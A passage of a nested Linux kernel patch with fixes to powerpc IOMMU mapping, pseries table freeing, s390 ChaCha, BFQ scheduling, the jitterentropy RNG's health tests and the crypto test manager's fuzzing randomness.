+@@ -517,7 +517,7 @@ int ppc_iommu_map_sg(struct device *dev, struct iommu_table *tbl,
+ 		/* Convert entry to a dma_addr_t */
+ 		entry += tbl->it_offset;
+ 		dma_addr = entry << tbl->it_page_shift;
+-		dma_addr |= (s->offset & ~IOMMU_PAGE_MASK(tbl));
++		dma_addr |= (vaddr & ~IOMMU_PAGE_MASK(tbl));
+ 
+ 		DBG("  - %lu pages, entry: %lx, dma_addr: %lx\n",
+ 			    npages, entry, dma_addr);
+@@ -904,6 +904,7 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 	unsigned int order;
+ 	unsigned int nio_pages, io_order;
+ 	struct page *page;
++	int tcesize = (1 << tbl->it_page_shift);
+ 
+ 	size = PAGE_ALIGN(size);
+ 	order = get_order(size);
+@@ -930,7 +931,8 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 	memset(ret, 0, size);
+ 
+ 	/* Set up tces to cover the allocated range */
+-	nio_pages = size >> tbl->it_page_shift;
++	nio_pages = IOMMU_PAGE_ALIGN(size, tbl) >> tbl->it_page_shift;
++
+ 	io_order = get_iommu_order(size, tbl);
+ 	mapping = iommu_alloc(dev, tbl, ret, nio_pages, DMA_BIDIRECTIONAL,
+ 			      mask >> tbl->it_page_shift, io_order, 0);
+@@ -938,7 +940,8 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 		free_pages((unsigned long)ret, order);
+ 		return NULL;
+ 	}
+-	*dma_handle = mapping;
++
++	*dma_handle = mapping | ((u64)ret & (tcesize - 1));
+ 	return ret;
+ }
+ 
+@@ -949,7 +952,7 @@ void iommu_free_coherent(struct iommu_table *tbl, size_t size,
+ 		unsigned int nio_pages;
+ 
+ 		size = PAGE_ALIGN(size);
+-		nio_pages = size >> tbl->it_page_shift;
++		nio_pages = IOMMU_PAGE_ALIGN(size, tbl) >> tbl->it_page_shift;
+ 		iommu_free(tbl, dma_handle, nio_pages);
+ 		size = PAGE_ALIGN(size);
+ 		free_pages((unsigned long)vaddr, get_order(size));
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 26245aaf12b8b..2297aa764ecdb 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -1040,8 +1040,8 @@ void radix__ptep_set_access_flags(struct vm_area_struct *vma, pte_t *ptep,
+ 				  pte_t entry, unsigned long address, int psize)
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+-	unsigned long set = pte_val(entry) & (_PAGE_DIRTY | _PAGE_ACCESSED |
+-					      _PAGE_RW | _PAGE_EXEC);
++	unsigned long set = pte_val(entry) & (_PAGE_DIRTY | _PAGE_SOFT_DIRTY |
++					      _PAGE_ACCESSED | _PAGE_RW | _PAGE_EXEC);
+ 
+ 	unsigned long change = pte_val(entry) ^ pte_val(*ptep);
+ 	/*
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 561adac690229..efba867017e22 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -85,19 +85,24 @@ static struct iommu_table_group *iommu_pseries_alloc_group(int node)
+ static void iommu_pseries_free_group(struct iommu_table_group *table_group,
+ 		const char *node_name)
+ {
+-	struct iommu_table *tbl;
+-
+ 	if (!table_group)
+ 		return;
+ 
+-	tbl = table_group->tables[0];
+ #ifdef CONFIG_IOMMU_API
+ 	if (table_group->group) {
+ 		iommu_group_put(table_group->group);
+ 		BUG_ON(table_group->group);
+ 	}
+ #endif
+-	iommu_tce_table_put(tbl);
++
++	/* Default DMA window table is at index 0, while DDW at 1. SR-IOV
++	 * adapters only have table on index 1.
++	 */
++	if (table_group->tables[0])
++		iommu_tce_table_put(table_group->tables[0]);
++
++	if (table_group->tables[1])
++		iommu_tce_table_put(table_group->tables[1]);
+ 
+ 	kfree(table_group);
+ }
+diff --git a/arch/riscv/kernel/probes/Makefile b/arch/riscv/kernel/probes/Makefile
+index 7f0840dcc31bc..90dea3abdbb22 100644
+--- a/arch/riscv/kernel/probes/Makefile
++++ b/arch/riscv/kernel/probes/Makefile
+@@ -4,3 +4,5 @@ obj-$(CONFIG_KPROBES)		+= kprobes_trampoline.o
+ obj-$(CONFIG_KPROBES_ON_FTRACE)	+= ftrace.o
+ obj-$(CONFIG_UPROBES)		+= uprobes.o decode-insn.o simulate-insn.o
+ CFLAGS_REMOVE_simulate-insn.o = $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook.o = $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook_trampoline.o = $(CC_FLAGS_FTRACE)
+diff --git a/arch/s390/crypto/chacha-glue.c b/arch/s390/crypto/chacha-glue.c
+index 7752bd314558e..5fae187f947a0 100644
+--- a/arch/s390/crypto/chacha-glue.c
++++ b/arch/s390/crypto/chacha-glue.c
+@@ -82,7 +82,7 @@ void chacha_crypt_arch(u32 *state, u8 *dst, const u8 *src,
+ 	 * it cannot handle a block of data or less, but otherwise
+ 	 * it can handle data of arbitrary size
+ 	 */
+-	if (bytes <= CHACHA_BLOCK_SIZE || nrounds != 20)
++	if (bytes <= CHACHA_BLOCK_SIZE || nrounds != 20 || !MACHINE_HAS_VX)
+ 		chacha_crypt_generic(state, dst, src, bytes, nrounds);
+ 	else
+ 		chacha20_crypt_s390(state, dst, src, bytes,
+diff --git a/arch/s390/kernel/Makefile b/arch/s390/kernel/Makefile
+index 5e6a23299790f..7d92aa57715ac 100644
+--- a/arch/s390/kernel/Makefile
++++ b/arch/s390/kernel/Makefile
+@@ -10,6 +10,7 @@ CFLAGS_REMOVE_ftrace.o		= $(CC_FLAGS_FTRACE)
+ 
+ # Do not trace early setup code
+ CFLAGS_REMOVE_early.o		= $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook.o		= $(CC_FLAGS_FTRACE)
+ 
+ endif
+ 
+diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile
+index f901658d9f7c0..42b5540dac58d 100644
+--- a/arch/x86/kernel/Makefile
++++ b/arch/x86/kernel/Makefile
+@@ -17,6 +17,7 @@ CFLAGS_REMOVE_ftrace.o = -pg
+ CFLAGS_REMOVE_early_printk.o = -pg
+ CFLAGS_REMOVE_head64.o = -pg
+ CFLAGS_REMOVE_sev.o = -pg
++CFLAGS_REMOVE_rethook.o = -pg
+ endif
+ 
+ KASAN_SANITIZE_head$(BITS).o				:= n
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index ff9d238894157..52eb79d60a3f3 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -637,6 +637,8 @@ retry:
+ 					sched_data->service_tree[i].wsum;
+ 			}
+ 		}
++		if (!wsum)
++			continue;
+ 		limit = DIV_ROUND_CLOSEST(limit * entity->weight, wsum);
+ 		if (entity->allocated >= limit) {
+ 			bfq_log_bfqq(bfqq->bfqd, bfqq,
+diff --git a/crypto/jitterentropy-kcapi.c b/crypto/jitterentropy-kcapi.c
+index 2d115bec15aeb..b9edfaa51b273 100644
+--- a/crypto/jitterentropy-kcapi.c
++++ b/crypto/jitterentropy-kcapi.c
+@@ -37,6 +37,7 @@
+  * DAMAGE.
+  */
+ 
++#include <linux/fips.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -59,11 +60,6 @@ void jent_zfree(void *ptr)
+ 	kfree_sensitive(ptr);
+ }
+ 
+-void jent_panic(char *s)
+-{
+-	panic("%s", s);
+-}
+-
+ void jent_memcpy(void *dest, const void *src, unsigned int n)
+ {
+ 	memcpy(dest, src, n);
+@@ -102,7 +98,6 @@ void jent_get_nstime(__u64 *out)
+ struct jitterentropy {
+ 	spinlock_t jent_lock;
+ 	struct rand_data *entropy_collector;
+-	unsigned int reset_cnt;
+ };
+ 
+ static int jent_kcapi_init(struct crypto_tfm *tfm)
+@@ -138,32 +133,30 @@ static int jent_kcapi_random(struct crypto_rng *tfm,
+ 
+ 	spin_lock(&rng->jent_lock);
+ 
+-	/* Return a permanent error in case we had too many resets in a row. */
+-	if (rng->reset_cnt > (1<<10)) {
+-		ret = -EFAULT;
+-		goto out;
+-	}
+-
+ 	ret = jent_read_entropy(rng->entropy_collector, rdata, dlen);
+ 
+-	/* Reset RNG in case of health failures */
+-	if (ret < -1) {
+-		pr_warn_ratelimited("Reset Jitter RNG due to health test failure: %s failure\n",
+-				    (ret == -2) ? "Repetition Count Test" :
+-						  "Adaptive Proportion Test");
+-
+-		rng->reset_cnt++;
+-
++	if (ret == -3) {
++		/* Handle permanent health test error */
++		/*
++		 * If the kernel was booted with fips=1, it implies that
++		 * the entire kernel acts as a FIPS 140 module. In this case
++		 * an SP800-90B permanent health test error is treated as
++		 * a FIPS module error.
++		 */
++		if (fips_enabled)
++			panic("Jitter RNG permanent health test failure\n");
++
++		pr_err("Jitter RNG permanent health test failure\n");
++		ret = -EFAULT;
++	} else if (ret == -2) {
++		/* Handle intermittent health test error */
++		pr_warn_ratelimited("Reset Jitter RNG due to intermittent health test failure\n");
+ 		ret = -EAGAIN;
+-	} else {
+-		rng->reset_cnt = 0;
+-
+-		/* Convert the Jitter RNG error into a usable error code */
+-		if (ret == -1)
+-			ret = -EINVAL;
++	} else if (ret == -1) {
++		/* Handle other errors */
++		ret = -EINVAL;
+ 	}
+ 
+-out:
+ 	spin_unlock(&rng->jent_lock);
+ 
+ 	return ret;
+@@ -197,6 +190,10 @@ static int __init jent_mod_init(void)
+ 
+ 	ret = jent_entropy_init();
+ 	if (ret) {
++		/* Handle permanent health test error */
++		if (fips_enabled)
++			panic("jitterentropy: Initialization failed with host not compliant with requirements: %d\n", ret);
++
+ 		pr_info("jitterentropy: Initialization failed with host not compliant with requirements: %d\n", ret);
+ 		return -EFAULT;
+ 	}
+diff --git a/crypto/jitterentropy.c b/crypto/jitterentropy.c
+index 93bff32138238..22f48bf4c6f57 100644
+--- a/crypto/jitterentropy.c
++++ b/crypto/jitterentropy.c
+@@ -85,10 +85,14 @@ struct rand_data {
+ 				      * bit generation */
+ 
+ 	/* Repetition Count Test */
+-	int rct_count;			/* Number of stuck values */
++	unsigned int rct_count;			/* Number of stuck values */
+ 
+-	/* Adaptive Proportion Test for a significance level of 2^-30 */
++	/* Intermittent health test failure threshold of 2^-30 */
++#define JENT_RCT_CUTOFF		30	/* Taken from SP800-90B sec 4.4.1 */
+ #define JENT_APT_CUTOFF		325	/* Taken from SP800-90B sec 4.4.2 */
++	/* Permanent health test failure threshold of 2^-60 */
++#define JENT_RCT_CUTOFF_PERMANENT	60
++#define JENT_APT_CUTOFF_PERMANENT	355
+ #define JENT_APT_WINDOW_SIZE	512	/* Data window size */
+ 	/* LSB of time stamp to process */
+ #define JENT_APT_LSB		16
+@@ -97,8 +101,6 @@ struct rand_data {
+ 	unsigned int apt_count;		/* APT counter */
+ 	unsigned int apt_base;		/* APT base reference */
+ 	unsigned int apt_base_set:1;	/* APT base reference set? */
+-
+-	unsigned int health_failure:1;	/* Permanent health failure */
+ };
+ 
+ /* Flags that can be used to initialize the RNG */
+@@ -169,19 +171,26 @@ static void jent_apt_insert(struct rand_data *ec, unsigned int delta_masked)
+ 		return;
+ 	}
+ 
+-	if (delta_masked == ec->apt_base) {
++	if (delta_masked == ec->apt_base)
+ 		ec->apt_count++;
+ 
+-		if (ec->apt_count >= JENT_APT_CUTOFF)
+-			ec->health_failure = 1;
+-	}
+-
+ 	ec->apt_observations++;
+ 
+ 	if (ec->apt_observations >= JENT_APT_WINDOW_SIZE)
+ 		jent_apt_reset(ec, delta_masked);
+ }
+ 
++/* APT health test failure detection */
++static int jent_apt_permanent_failure(struct rand_data *ec)
++{
++	return (ec->apt_count >= JENT_APT_CUTOFF_PERMANENT) ? 1 : 0;
++}
++
++static int jent_apt_failure(struct rand_data *ec)
++{
++	return (ec->apt_count >= JENT_APT_CUTOFF) ? 1 : 0;
++}
++
+ /***************************************************************************
+  * Stuck Test and its use as Repetition Count Test
+  *
+@@ -206,55 +215,14 @@ static void jent_apt_insert(struct rand_data *ec, unsigned int delta_masked)
+  */
+ static void jent_rct_insert(struct rand_data *ec, int stuck)
+ {
+-	/*
+-	 * If we have a count less than zero, a previous RCT round identified
+-	 * a failure. We will not overwrite it.
+-	 */
+-	if (ec->rct_count < 0)
+-		return;
+-
+ 	if (stuck) {
+ 		ec->rct_count++;
+-
+-		/*
+-		 * The cutoff value is based on the following consideration:
+-		 * alpha = 2^-30 as recommended in FIPS 140-2 IG 9.8.
+-		 * In addition, we require an entropy value H of 1/OSR as this
+-		 * is the minimum entropy required to provide full entropy.
+-		 * Note, we collect 64 * OSR deltas for inserting them into
+-		 * the entropy pool which should then have (close to) 64 bits
+-		 * of entropy.
+-		 *
+-		 * Note, ec->rct_count (which equals to value B in the pseudo
+-		 * code of SP800-90B section 4.4.1) starts with zero. Hence
+-		 * we need to subtract one from the cutoff value as calculated
+-		 * following SP800-90B.
+-		 */
+-		if ((unsigned int)ec->rct_count >= (31 * ec->osr)) {
+-			ec->rct_count = -1;
+-			ec->health_failure = 1;
+-		}
+ 	} else {
++		/* Reset RCT */
+ 		ec->rct_count = 0;
+ 	}
+ }
+ 
+-/*
+- * Is there an RCT health test failure?
+- *
+- * @ec [in] Reference to entropy collector
+- *
+- * @return
+- * 	0 No health test failure
+- * 	1 Permanent health test failure
+- */
+-static int jent_rct_failure(struct rand_data *ec)
+-{
+-	if (ec->rct_count < 0)
+-		return 1;
+-	return 0;
+-}
+-
+ static inline __u64 jent_delta(__u64 prev, __u64 next)
+ {
+ #define JENT_UINT64_MAX		(__u64)(~((__u64) 0))
+@@ -303,18 +271,26 @@ static int jent_stuck(struct rand_data *ec, __u64 current_delta)
+ 	return 0;
+ }
+ 
+-/*
+- * Report any health test failures
+- *
+- * @ec [in] Reference to entropy collector
+- *
+- * @return
+- * 	0 No health test failure
+- * 	1 Permanent health test failure
+- */
++/* RCT health test failure detection */
++static int jent_rct_permanent_failure(struct rand_data *ec)
++{
++	return (ec->rct_count >= JENT_RCT_CUTOFF_PERMANENT) ? 1 : 0;
++}
++
++static int jent_rct_failure(struct rand_data *ec)
++{
++	return (ec->rct_count >= JENT_RCT_CUTOFF) ? 1 : 0;
++}
++
++/* Report of health test failures */
+ static int jent_health_failure(struct rand_data *ec)
+ {
+-	return ec->health_failure;
++	return jent_rct_failure(ec) | jent_apt_failure(ec);
++}
++
++static int jent_permanent_health_failure(struct rand_data *ec)
++{
++	return jent_rct_permanent_failure(ec) | jent_apt_permanent_failure(ec);
+ }
+ 
+ /***************************************************************************
+@@ -600,8 +576,8 @@ static void jent_gen_entropy(struct rand_data *ec)
+  *
+  * The following error codes can occur:
+  *	-1	entropy_collector is NULL
+- *	-2	RCT failed
+- *	-3	APT test failed
++ *	-2	Intermittent health failure
++ *	-3	Permanent health failure
+  */
+ int jent_read_entropy(struct rand_data *ec, unsigned char *data,
+ 		      unsigned int len)
+@@ -616,39 +592,23 @@ int jent_read_entropy(struct rand_data *ec, unsigned char *data,
+ 
+ 		jent_gen_entropy(ec);
+ 
+-		if (jent_health_failure(ec)) {
+-			int ret;
+-
+-			if (jent_rct_failure(ec))
+-				ret = -2;
+-			else
+-				ret = -3;
+-
++		if (jent_permanent_health_failure(ec)) {
+ 			/*
+-			 * Re-initialize the noise source
+-			 *
+-			 * If the health test fails, the Jitter RNG remains
+-			 * in failure state and will return a health failure
+-			 * during next invocation.
++			 * At this point, the Jitter RNG instance is considered
++			 * as a failed instance. There is no rerun of the
++			 * startup test any more, because the caller
++			 * is assumed to not further use this instance.
+ 			 */
+-			if (jent_entropy_init())
+-				return ret;
+-
+-			/* Set APT to initial state */
+-			jent_apt_reset(ec, 0);
+-			ec->apt_base_set = 0;
+-
+-			/* Set RCT to initial state */
+-			ec->rct_count = 0;
+-
+-			/* Re-enable Jitter RNG */
+-			ec->health_failure = 0;
+-
++			return -3;
++		} else if (jent_health_failure(ec)) {
+ 			/*
+-			 * Return the health test failure status to the
+-			 * caller as the generated value is not appropriate.
++			 * Perform startup health tests and return permanent
++			 * error if it fails.
+ 			 */
+-			return ret;
++			if (jent_entropy_init())
++				return -3;
++
++			return -2;
+ 		}
+ 
+ 		if ((DATA_SIZE_BITS / 8) < len)
+diff --git a/crypto/jitterentropy.h b/crypto/jitterentropy.h
+index b7397b617ef05..5cc583f6bc6b8 100644
+--- a/crypto/jitterentropy.h
++++ b/crypto/jitterentropy.h
+@@ -2,7 +2,6 @@
+ 
+ extern void *jent_zalloc(unsigned int len);
+ extern void jent_zfree(void *ptr);
+-extern void jent_panic(char *s);
+ extern void jent_memcpy(void *dest, const void *src, unsigned int n);
+ extern void jent_get_nstime(__u64 *out);
+ 
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index 814d2dc87d7e8..56c39a0c94952 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -852,12 +852,50 @@ static int prepare_keybuf(const u8 *key, unsigned int ksize,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
++/*
++ * The fuzz tests use prandom instead of the normal Linux RNG since they don't
++ * need cryptographically secure random numbers.  This greatly improves the
++ * performance of these tests, especially if they are run before the Linux RNG
++ * has been initialized or if they are run on a lockdep-enabled kernel.
++ */
++
++static inline void init_rnd_state(struct rnd_state *rng)
++{
++	prandom_seed_state(rng, get_random_u64());
++}
++
++static inline u8 prandom_u8(struct rnd_state *rng)
++{
++	return prandom_u32_state(rng);
++}
++
++static inline u32 prandom_u32_below(struct rnd_state *rng, u32 ceil)
++{
++	/*
++	 * This is slightly biased for non-power-of-2 values of 'ceil', but this
++	 * isn't important here.
++	 */
++	return prandom_u32_state(rng) % ceil;
++}
++
++static inline bool prandom_bool(struct rnd_state *rng)
++{
++	return prandom_u32_below(rng, 2);
++}
++
++static inline u32 prandom_u32_inclusive(struct rnd_state *rng,
++					u32 floor, u32 ceil)
++{
++	return floor + prandom_u32_below(rng, ceil - floor + 1);
++}
++
+ /* Generate a random length in range [0, max_len], but prefer smaller values */
+-static unsigned int generate_random_length(unsigned int max_len)
++static unsigned int generate_random_length(struct rnd_state *rng,
++					   unsigned int max_len)
+ {
+-	unsigned int len = prandom_u32_max(max_len + 1);
++	unsigned int len = prandom_u32_below(rng, max_len + 1);
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		return len % 64;
+ 	case 1:
+@@ -870,43 +908,44 @@ static unsigned int generate_random_length(unsigned int max_len)
+ }
+ 
+ /* Flip a random bit in the given nonempty data buffer */
+-static void flip_random_bit(u8 *buf, size_t size)
++static void flip_random_bit(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t bitpos;
+ 
+-	bitpos = prandom_u32_max(size * 8);
++	bitpos = prandom_u32_below(rng, size * 8);
+ 	buf[bitpos / 8] ^= 1 << (bitpos % 8);
+ }
+ 
+ /* Flip a random byte in the given nonempty data buffer */
+-static void flip_random_byte(u8 *buf, size_t size)
++static void flip_random_byte(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+-	buf[prandom_u32_max(size)] ^= 0xff;
++	buf[prandom_u32_below(rng, size)] ^= 0xff;
+ }
+ 
+ /* Sometimes make some random changes to the given nonempty data buffer */
+-static void mutate_buffer(u8 *buf, size_t size)
++static void mutate_buffer(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t num_flips;
+ 	size_t i;
+ 
+ 	/* Sometimes flip some bits */
+-	if (prandom_u32_max(4) == 0) {
+-		num_flips = min_t(size_t, 1 << prandom_u32_max(8), size * 8);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8),
++				  size * 8);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_bit(buf, size);
++			flip_random_bit(rng, buf, size);
+ 	}
+ 
+ 	/* Sometimes flip some bytes */
+-	if (prandom_u32_max(4) == 0) {
+-		num_flips = min_t(size_t, 1 << prandom_u32_max(8), size);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8), size);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_byte(buf, size);
++			flip_random_byte(rng, buf, size);
+ 	}
+ }
+ 
+ /* Randomly generate 'count' bytes, but sometimes make them "interesting" */
+-static void generate_random_bytes(u8 *buf, size_t count)
++static void generate_random_bytes(struct rnd_state *rng, u8 *buf, size_t count)
+ {
+ 	u8 b;
+ 	u8 increment;
+@@ -915,11 +954,11 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 	if (count == 0)
+ 		return;
+ 
+-	switch (prandom_u32_max(8)) { /* Choose a generation strategy */
++	switch (prandom_u32_below(rng, 8)) { /* Choose a generation strategy */
+ 	case 0:
+ 	case 1:
+ 		/* All the same byte, plus optional mutations */
+-		switch (prandom_u32_max(4)) {
++		switch (prandom_u32_below(rng, 4)) {
+ 		case 0:
+ 			b = 0x00;
+ 			break;
+@@ -927,28 +966,28 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 			b = 0xff;
+ 			break;
+ 		default:
+-			b = get_random_u8();
++			b = prandom_u8(rng);
+ 			break;
+ 		}
+ 		memset(buf, b, count);
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	case 2:
+ 		/* Ascending or descending bytes, plus optional mutations */
+-		increment = get_random_u8();
+-		b = get_random_u8();
++		increment = prandom_u8(rng);
++		b = prandom_u8(rng);
+ 		for (i = 0; i < count; i++, b += increment)
+ 			buf[i] = b;
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	default:
+ 		/* Fully random bytes */
+-		for (i = 0; i < count; i++)
+-			buf[i] = get_random_u8();
++		prandom_bytes_state(rng, buf, count);
+ 	}
+ }
+ 
+-static char *generate_random_sgl_divisions(struct test_sg_division *divs,
++static char *generate_random_sgl_divisions(struct rnd_state *rng,
++					   struct test_sg_division *divs,
+ 					   size_t max_divs, char *p, char *end,
+ 					   bool gen_flushes, u32 req_flags)
+ {
+@@ -959,24 +998,26 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 		unsigned int this_len;
+ 		const char *flushtype_str;
+ 
+-		if (div == &divs[max_divs - 1] || prandom_u32_max(2) == 0)
++		if (div == &divs[max_divs - 1] || prandom_bool(rng))
+ 			this_len = remaining;
+ 		else
+-			this_len = 1 + prandom_u32_max(remaining);
++			this_len = prandom_u32_inclusive(rng, 1, remaining);
+ 		div->proportion_of_total = this_len;
+ 
+-		if (prandom_u32_max(4) == 0)
+-			div->offset = (PAGE_SIZE - 128) + prandom_u32_max(128);
+-		else if (prandom_u32_max(2) == 0)
+-			div->offset = prandom_u32_max(32);
++		if (prandom_u32_below(rng, 4) == 0)
++			div->offset = prandom_u32_inclusive(rng,
++							    PAGE_SIZE - 128,
++							    PAGE_SIZE - 1);
++		else if (prandom_bool(rng))
++			div->offset = prandom_u32_below(rng, 32);
+ 		else
+-			div->offset = prandom_u32_max(PAGE_SIZE);
+-		if (prandom_u32_max(8) == 0)
++			div->offset = prandom_u32_below(rng, PAGE_SIZE);
++		if (prandom_u32_below(rng, 8) == 0)
+ 			div->offset_relative_to_alignmask = true;
+ 
+ 		div->flush_type = FLUSH_TYPE_NONE;
+ 		if (gen_flushes) {
+-			switch (prandom_u32_max(4)) {
++			switch (prandom_u32_below(rng, 4)) {
+ 			case 0:
+ 				div->flush_type = FLUSH_TYPE_REIMPORT;
+ 				break;
+@@ -988,7 +1029,7 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 
+ 		if (div->flush_type != FLUSH_TYPE_NONE &&
+ 		    !(req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-		    prandom_u32_max(2) == 0)
++		    prandom_bool(rng))
+ 			div->nosimd = true;
+ 
+ 		switch (div->flush_type) {
+@@ -1023,7 +1064,8 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ }
+ 
+ /* Generate a random testvec_config for fuzz testing */
+-static void generate_random_testvec_config(struct testvec_config *cfg,
++static void generate_random_testvec_config(struct rnd_state *rng,
++					   struct testvec_config *cfg,
+ 					   char *name, size_t max_namelen)
+ {
+ 	char *p = name;
+@@ -1035,7 +1077,7 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 
+ 	p += scnprintf(p, end - p, "random:");
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 	case 1:
+ 		cfg->inplace_mode = OUT_OF_PLACE;
+@@ -1050,12 +1092,12 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		cfg->req_flags |= CRYPTO_TFM_REQ_MAY_SLEEP;
+ 		p += scnprintf(p, end - p, " may_sleep");
+ 	}
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		cfg->finalization_type = FINALIZATION_TYPE_FINAL;
+ 		p += scnprintf(p, end - p, " use_final");
+@@ -1070,36 +1112,37 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-	    prandom_u32_max(2) == 0) {
++	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) && prandom_bool(rng)) {
+ 		cfg->nosimd = true;
+ 		p += scnprintf(p, end - p, " nosimd");
+ 	}
+ 
+ 	p += scnprintf(p, end - p, " src_divs=[");
+-	p = generate_random_sgl_divisions(cfg->src_divs,
++	p = generate_random_sgl_divisions(rng, cfg->src_divs,
+ 					  ARRAY_SIZE(cfg->src_divs), p, end,
+ 					  (cfg->finalization_type !=
+ 					   FINALIZATION_TYPE_DIGEST),
+ 					  cfg->req_flags);
+ 	p += scnprintf(p, end - p, "]");
+ 
+-	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_u32_max(2) == 0) {
++	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_bool(rng)) {
+ 		p += scnprintf(p, end - p, " dst_divs=[");
+-		p = generate_random_sgl_divisions(cfg->dst_divs,
++		p = generate_random_sgl_divisions(rng, cfg->dst_divs,
+ 						  ARRAY_SIZE(cfg->dst_divs),
+ 						  p, end, false,
+ 						  cfg->req_flags);
+ 		p += scnprintf(p, end - p, "]");
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
+-		cfg->iv_offset = 1 + prandom_u32_max(MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->iv_offset = prandom_u32_inclusive(rng, 1,
++						       MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " iv_offset=%u", cfg->iv_offset);
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
+-		cfg->key_offset = 1 + prandom_u32_max(MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->key_offset = prandom_u32_inclusive(rng, 1,
++							MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " key_offset=%u", cfg->key_offset);
+ 	}
+ 
+@@ -1612,11 +1655,14 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_hash_vec_cfg(vec, vec_name, &cfg,
+ 						req, desc, tsgl, hashstate);
+@@ -1634,15 +1680,16 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+  * Generate a hash test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_hash_testvec(struct shash_desc *desc,
++static void generate_random_hash_testvec(struct rnd_state *rng,
++					 struct shash_desc *desc,
+ 					 struct hash_testvec *vec,
+ 					 unsigned int maxkeysize,
+ 					 unsigned int maxdatasize,
+ 					 char *name, size_t max_namelen)
+ {
+ 	/* Data */
+-	vec->psize = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->plaintext, vec->psize);
++	vec->psize = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->plaintext, vec->psize);
+ 
+ 	/*
+ 	 * Key: length in range [1, maxkeysize], but usually choose maxkeysize.
+@@ -1652,9 +1699,9 @@ static void generate_random_hash_testvec(struct shash_desc *desc,
+ 	vec->ksize = 0;
+ 	if (maxkeysize) {
+ 		vec->ksize = maxkeysize;
+-		if (prandom_u32_max(4) == 0)
+-			vec->ksize = 1 + prandom_u32_max(maxkeysize);
+-		generate_random_bytes((u8 *)vec->key, vec->ksize);
++		if (prandom_u32_below(rng, 4) == 0)
++			vec->ksize = prandom_u32_inclusive(rng, 1, maxkeysize);
++		generate_random_bytes(rng, (u8 *)vec->key, vec->ksize);
+ 
+ 		vec->setkey_error = crypto_shash_setkey(desc->tfm, vec->key,
+ 							vec->ksize);
+@@ -1688,6 +1735,7 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
